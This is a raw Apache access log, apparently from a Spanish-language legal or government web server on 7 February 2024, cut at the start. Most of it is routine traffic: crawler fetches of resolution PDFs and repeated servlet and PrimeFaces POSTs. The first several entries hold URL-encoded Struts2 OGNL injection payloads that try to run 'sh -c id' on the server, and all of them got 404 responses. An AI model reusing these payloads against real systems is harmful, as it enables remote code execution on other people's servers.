C%23genxor.close()%7D HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1018
216.245.221.92 - - [07/Feb/2024:00:55:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:00:55:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:00:56:16 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1139
201.245.192.253 - - [07/Feb/2024:00:56:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:57:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:57:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
186.98.65.195 - - [07/Feb/2024:00:57:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 67134
186.98.65.195 - - [07/Feb/2024:00:57:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:57:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:57:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:57:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:57:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 60520
186.98.65.195 - - [07/Feb/2024:00:57:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 60520
186.98.65.195 - - [07/Feb/2024:00:57:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.98.65.195 - - [07/Feb/2024:00:57:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.98.65.195 - - [07/Feb/2024:00:57:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.98.65.195 - - [07/Feb/2024:00:57:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5180
186.98.65.195 - - [07/Feb/2024:00:58:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 145690
186.98.65.195 - - [07/Feb/2024:00:58:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:58:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:58:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:58:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:58:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5574
172.22.2.4 - - [07/Feb/2024:00:57:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:00:58:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:00:57:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
201.245.192.253 - - [07/Feb/2024:00:59:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [07/Feb/2024:01:00:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:01:00:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.224 - - [07/Feb/2024:01:01:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9717.pdf HTTP/1.1" 200 273631
172.22.2.4 - - [07/Feb/2024:01:01:51 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
201.245.192.253 - - [07/Feb/2024:01:01:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:01:52 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
201.245.192.253 - - [07/Feb/2024:01:02:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:02:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:01:03:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:02:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:01:04:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:03:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
216.245.221.92 - - [07/Feb/2024:01:05:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:01:05:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:06:42 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [07/Feb/2024:01:06:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:07:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:07:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:01:08:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:09:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.104 - - [07/Feb/2024:01:10:21 -0500] "GET /BLA/resoluciones/Autos%202008/0368.pdf HTTP/1.1" 200 151967
172.22.2.4 - - [07/Feb/2024:01:08:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Feb/2024:01:10:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:01:10:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.104 - - [07/Feb/2024:01:11:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5694.pdf HTTP/1.1" 200 537555
172.22.2.4 - - [07/Feb/2024:01:09:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59173
186.98.65.195 - - [07/Feb/2024:01:11:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40495
186.98.65.195 - - [07/Feb/2024:01:11:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33881
186.98.65.195 - - [07/Feb/2024:01:11:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33881
186.98.65.195 - - [07/Feb/2024:01:11:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33881
186.98.65.195 - - [07/Feb/2024:01:11:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33881
186.98.65.195 - - [07/Feb/2024:01:11:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
186.98.65.195 - - [07/Feb/2024:01:11:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
186.98.65.195 - - [07/Feb/2024:01:11:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
186.98.65.195 - - [07/Feb/2024:01:11:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
186.98.65.195 - - [07/Feb/2024:01:11:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
186.98.65.195 - - [07/Feb/2024:01:11:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5060
186.98.65.195 - - [07/Feb/2024:01:11:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 152610
186.98.65.195 - - [07/Feb/2024:01:11:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:11:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5574
201.245.192.253 - - [07/Feb/2024:01:11:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
199.16.157.183 - - [07/Feb/2024:01:11:59 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
201.245.192.253 - - [07/Feb/2024:01:12:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:12:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
66.249.79.104 - - [07/Feb/2024:01:13:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1699.pdf HTTP/1.1" 200 300531
66.249.79.105 - - [07/Feb/2024:01:13:50 -0500] "GET /BLA/resoluciones/AUTOS%202011/7732.pdf HTTP/1.1" 200 246019
201.245.192.253 - - [07/Feb/2024:01:13:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [07/Feb/2024:01:14:10 -0500] "GET /BLA/resoluciones/AUTOS%202022/2177.pdf HTTP/1.1" 200 2339677
216.244.66.195 - - [07/Feb/2024:01:14:23 -0500] "GET /BLA/resoluciones/AUTOS%202022/2200.pdf HTTP/1.1" 200 1460703
216.244.66.195 - - [07/Feb/2024:01:14:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0651.pdf HTTP/1.1" 200 518896
157.55.39.60 - - [07/Feb/2024:01:13:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61911
201.245.192.253 - - [07/Feb/2024:01:14:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [07/Feb/2024:01:14:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0791.pdf HTTP/1.1" 200 470923
216.244.66.195 - - [07/Feb/2024:01:15:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1216.pdf HTTP/1.1" 200 514482
216.244.66.195 - - [07/Feb/2024:01:15:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0727.pdf HTTP/1.1" 200 254018
216.245.221.92 - - [07/Feb/2024:01:15:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [07/Feb/2024:01:15:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0794.pdf HTTP/1.1" 200 348262
216.244.66.195 - - [07/Feb/2024:01:15:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1897.pdf HTTP/1.1" 200 264959
201.245.192.253 - - [07/Feb/2024:01:15:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [07/Feb/2024:01:16:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2089.pdf HTTP/1.1" 200 288056
172.22.2.4 - - [07/Feb/2024:01:14:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [07/Feb/2024:01:16:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2295.pdf HTTP/1.1" 200 261780
216.244.66.195 - - [07/Feb/2024:01:16:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/5052.pdf HTTP/1.1" 200 249573
201.245.192.253 - - [07/Feb/2024:01:16:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:15:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52384
201.245.192.253 - - [07/Feb/2024:01:17:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:01:17:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.225 - - [07/Feb/2024:01:18:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6047.pdf HTTP/1.1" 200 494067
201.245.192.253 - - [07/Feb/2024:01:18:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.225 - - [07/Feb/2024:01:19:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0563.pdf HTTP/1.1" 200 116630
66.249.79.224 - - [07/Feb/2024:01:19:31 -0500] "GET /BLA/resoluciones/AUTOS%202008/1964.pdf HTTP/1.1" 200 91704
167.71.238.60 - - [07/Feb/2024:01:19:42 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Feb/2024:01:19:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:19:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40034
201.245.192.253 - - [07/Feb/2024:01:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34762
201.245.192.253 - - [07/Feb/2024:01:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36919
66.249.79.224 - - [07/Feb/2024:01:20:33 -0500] "GET /BLA/resoluciones/AUTOS%202012/2827.pdf HTTP/1.1" 200 418727
216.245.221.92 - - [07/Feb/2024:01:20:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:01:20:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:01:21:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34762
201.245.192.253 - - [07/Feb/2024:01:21:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:20:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:01:22:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:01:22:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:01:21:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
201.245.192.253 - - [07/Feb/2024:01:23:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.98.65.195 - - [07/Feb/2024:01:24:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40375
186.98.65.195 - - [07/Feb/2024:01:24:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33761
186.98.65.195 - - [07/Feb/2024:01:24:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33761
186.98.65.195 - - [07/Feb/2024:01:24:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33761
186.98.65.195 - - [07/Feb/2024:01:24:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33761
186.98.65.195 - - [07/Feb/2024:01:24:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33761
186.98.65.195 - - [07/Feb/2024:01:24:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33761
186.98.65.195 - - [07/Feb/2024:01:24:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
186.98.65.195 - - [07/Feb/2024:01:24:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
186.98.65.195 - - [07/Feb/2024:01:24:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
186.98.65.195 - - [07/Feb/2024:01:24:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
186.98.65.195 - - [07/Feb/2024:01:24:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
186.98.65.195 - - [07/Feb/2024:01:24:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
186.98.65.195 - - [07/Feb/2024:01:24:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31341
186.98.65.195 - - [07/Feb/2024:01:24:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 43406
186.98.65.195 - - [07/Feb/2024:01:24:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31373
